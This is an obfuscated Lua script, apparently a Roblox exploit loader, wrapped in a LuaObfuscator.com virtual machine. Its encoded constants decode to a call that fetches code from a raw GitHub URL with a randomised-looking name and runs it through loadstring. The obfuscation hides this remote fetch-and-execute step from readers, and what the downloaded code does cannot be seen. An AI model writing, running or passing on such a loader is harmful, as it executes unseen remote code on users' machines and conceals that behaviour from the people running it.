--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -(0 + 0))) -(v32-1)) + (2 -1))) ;return v84-(v84%((98 + 522) -((1432 -(282 + 595)) + 64))) ;else local v85=(933 -((2494 -(1523 + 114)) + 74))^(v32-((512 + 57) -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==(0 -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (1068 -(68 + 997)) );v19=v19 + 4 ;v34=(2228 -(892 + 65)) -((538 -312) + 1044) ;end if ((4 -3)==v34) then return (v38 * (16777333 -(32 + 85))) + (v37 * (64226 + 1310)) + (v36 * 256) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39==(3 + 0)) then v46=nil;while true do local v90=0 + 0 ;while true do if (1==v90) then if (v40~=0) then else local v100=0 -0 ;while true do if (v100~=(1264 -(1091 + 171))) then else v40=1 + 0 ;break;end if (v100~=0) then else v41={};v42={};v100=1;end if (v100==1) then v43={};v44={v41,v42,nil,v43};v100=9 -7 ;end end end break;end if (v90==0) then local v99=698 -(208 + 490) ;while true do if (1~=v99) then else v90=1 + 0 ;break;end if (v99==0) then if (v40==(1 + 0)) then local v128=0;while true do if (v128~=(838 -(660 + 176))) then else v40=2;break;end if (v128~=1) then else for v142=1,v45 do local v143=0;local v144;local v145;while true do if (v143==0) then local v154=0;while true do if (v154~=1) then else v143=1 + 0 ;break;end if (v154~=0) then else v144=v22();v145=nil;v154=1;end end end if (v143~=(203 -(14 + 188))) then else if (v144==1) then v145=v22()~=0 ;elseif (v144==2) then v145=v25();elseif (v144==(678 -(534 + 141))) then v145=v26();end v46[v142]=v145;break;end end end v44[2 + 1 ]=v22();v128=2 + 0 ;end if (v128==(0 + 0)) then v45=v24();v46={};v128=1 -0 ;end end end if (v40==2) then local v129=0;while true do if (v129~=1) then else return v44;end if ((0 -0)==v129) then for v146=1,v24() do local v147=0 -0 ;local v148;local v149;local v150;local v151;while true do if (v147==(2 + 0)) then while true do if (v148==(1 + 0)) then v151=nil;while true do if (v149==1) then while true do if (v150==(396 -(115 + 281))) then v151=v22();if (v21(v151,2 -1 ,1)==(0 + 0)) then local v158=0;local v159;local v160;local v161;local v162;local v163;while true do if (v158==(0 -0)) then v159=0;v160=nil;v158=3 -2 ;end if (v158==(869 -(550 + 317))) then v163=nil;while true do if (2==v159) then while true do if (v160~=2) then else local v167=0 -0 ;while true do if (v167==0) then if (v21(v162,1,1)~=(1 -0)) then else v163[2]=v46[v163[5 -3 ]];end if (v21(v162,287 -(134 + 151) ,1667 -(970 + 695) )==(1 -0)) then v163[1993 -(582 + 1408) ]=v46[v163[10 -7 ]];end v167=1 -0 ;end if (v167~=(3 -2)) then else v160=1827 -(1195 + 629) ;break;end end end if (v160~=(1 -0)) then else v163={v23(),v23(),nil,nil};if (v161==(780 -(162 + 618))) then local v171=0 + 0 ;local v172;local v173;while true do if (v171~=0) then else v172=0 + 0 ;v173=nil;v171=1;end if (v171~=1) then else while true do if (v172==(0 -0)) then v173=0 -0 ;while true do if (v173~=(0 + 0)) then else v163[3]=v23();v163[1640 -(1373 + 263) ]=v23();break;end end break;end end break;end end elseif (v161==(1001 -(451 + 549))) then v163[3]=v24();elseif (v161==(1 + 1)) then v163[3]=v24() -((2 -0)^16) ;elseif (v161==3) then local v183=0 -0 ;while true do if ((1384 -(746 + 638))==v183) then v163[3]=v24() -(2^(7 + 9)) ;v163[5 -1 ]=v23();break;end end end v160=2;end if (0~=v160) then else local v168=341 -(218 + 123) ;local v169;while true do if (v168==(1581 -(1535 + 46))) then v169=0;while true do if (v169~=(1 + 0)) then else v160=1 + 0 ;break;end if (v169==0) then local v182=560 -(306 + 254) ;while true do if (0==v182) then v161=v21(v151,1 + 1 ,5 -2 );v162=v21(v151,4,1473 -(899 + 568) );v182=1 + 0 ;end if (1~=v182) then else v169=2 -1 ;break;end end end end break;end end end if (v160~=(606 -(268 + 335))) then else if (v21(v162,3,293 -(60 + 230) )==(573 -(426 + 146))) then v163[1 + 3 ]=v46[v163[1460 -(282 + 1174) ]];end v41[v146]=v163;break;end end break;end if (v159==(811 -(569 + 242))) then local v165=0 -0 ;while true do if (v165==0) then v160=0 + 0 ;v161=nil;v165=1025 -(706 + 318) ;end if (1~=v165) then else v159=1;break;end end end if (v159~=(1252 -(721 + 530))) then else local v166=1271 -(945 + 326) ;while true do if (v166~=0) then else v162=nil;v163=nil;v166=2 -1 ;end if (v166==1) then v159=2;break;end end end end break;end if (v158~=(1 + 0)) then else v161=nil;v162=nil;v158=702 -(271 + 429) ;end end end break;end end break;end if (v149==(0 + 0)) then local v156=1500 -(1408 + 92) ;local v157;while true do if (v156~=0) then else v157=0;while true do if ((1087 -(461 + 625))~=v157) then else v149=1289 -(993 + 295) ;break;end if (v157~=0) then else local v164=0 + 0 ;while true do if (v164==0) then v150=0;v151=nil;v164=1172 -(418 + 753) ;end if (v164==(1 + 0)) then v157=1 + 0 ;break;end end end end break;end end end end break;end if (v148==(0 + 0)) then v149=0;v150=nil;v148=1;end end break;end if (v147==(1 + 0)) then v150=nil;v151=nil;v147=531 -(406 + 123) ;end if (v147==0) then v148=1769 -(1749 + 20) ;v149=nil;v147=1;end end end for v152=1,v24() do v42[v152-1 ]=v29();end v129=1;end end end v99=1;end end end end end break;end if (v39==(1 + 1)) then v44=nil;v45=nil;v39=3;end if (v39~=(1322 -(1249 + 73))) then else v40=0 + 0 ;v41=nil;v39=1146 -(466 + 679) ;end if (v39~=1) then else v42=nil;v43=nil;v39=2;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=2 -1 ;local v50=(v21(v48,2 -1 ,1920 -(106 + 1794) ) * ((1 + 1)^(9 + 23))) + v47 ;local v51=v21(v48,61 -40 ,83 -52 );local v52=((v21(v48,146 -(4 + 110) )==(585 -(57 + 527))) and  -(1428 -(41 + 1386))) or ((72 + 32) -(17 + 86)) ;if (v51==((1257 -(1043 + 214)) + 0)) then if (v50==0) then return v52 * (0 -(0 -0)) ;else local v91=0 -0 ;while true do if (v91==(166 -(122 + 44))) then v51=1 -0 ;v49=(1212 -(323 + 889)) -0 ;break;end end end elseif (v51==(1666 + (1025 -644))) then return ((v50==(0 + 0)) and (v52 * ((1 -0)/0))) or (v52 * NaN) ;end return v8(v52,v51-(1088 -(30 + 35)) ) * (v49 + (v50/((582 -(361 + 219))^52))) ;end v26=nil;function v26(v53)local v54;if  not v53 then local v86=320 -(42 + 11 + 267) ;while true do if (v86==(0 + (126 -(116 + 10)))) then v53=v24();if (v53==(413 -(15 + 398))) then return "";end break;end end end v54=v3(v16,v19,(v19 + v53) -1 );v19=v19 + v53 ;local v55={};for v68=983 -(2 + 16 + 964) , #v54 do v55[v68]=v2(v1(v3(v54,v68,v68)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=0;local v57;while true do if (v56==0) then v57=v1(v16,v19,v19);v19=v19 + (739 -(276 + 266 + 196)) ;v56=1 -(0 + 0) ;end if (v56==(1 + (0 -0))) then return v57;end end end v23=nil;function v23()local v58=0 -0 ;local v59;local v60;while true do if ((1551 -(1126 + 425))==v58) then v59,v60=v1(v16,v19,v19 + ((769 -362) -(118 + 287)) );v19=v19 + 1 + 1 ;v58=1 + 0 ;end if (v58==(3 -2)) then return (v60 * (1377 -(118 + 995 + 8))) + v59 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v87=v2(v0(v61,16));if v20 then local v92=v5(v87,v20);v20=nil;return v92;else return v87;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v88=0,v78 do if (v88>=v72) then v76[v88-v72 ]=v77[v88 + 1 ];else v80[v88]=v77[v88 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do local v89=0;while true do if (v89==0) then v82=v70[v74];v83=v82[1];v89=1;end if (v89==1) then if (v83<=3) then if (v83<=1) then if (v83>0) then v80[v82[2]]=v64[v82[3]];else local v103;local v104,v105;local v106;local v107;v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v107=v82[2];v106=v80[v82[3]];v80[v107 + 1 ]=v106;v80[v107]=v106[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v107=v82[2];v104,v105=v73(v80[v107](v13(v80,v107 + 1 ,v82[3])));v75=(v105 + v107) -1 ;v103=0;for v130=v107,v75 do v103=v103 + 1 ;v80[v130]=v104[v103];end v74=v74 + 1 ;v82=v70[v74];v107=v82[2];v80[v107]=v80[v107](v13(v80,v107 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];do return;end end elseif (v83==2) then local v117=v82[2];local v118,v119=v73(v80[v117](v13(v80,v117 + 1 ,v82[3])));v75=(v119 + v117) -1 ;local v120=0;for v133=v117,v75 do v120=v120 + 1 ;v80[v133]=v118[v120];end else do return;end end elseif (v83<=5) then if (v83==4) then local v121=0;local v122;local v123;while true do if (v121==1) then v80[v122 + 1 ]=v123;v80[v122]=v123[v82[4]];break;end if (v121==0) then v122=v82[2];v123=v80[v82[3]];v121=1;end end else v80[v82[2]]=v82[3];end elseif (v83==6) then local v126=v82[2];v80[v126]=v80[v126](v13(v80,v126 + 1 ,v75));else v80[v82[2]]();end v74=v74 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403783O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F726570697461736C72656173637761666A6F6C6A6E656E67617A61727773696E63616D6973612F2D62786E2D676E7866682D6878676A2D617764772O6164766478632F6D61696E2F7A7864667662636264676E78647800083O00124O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);end
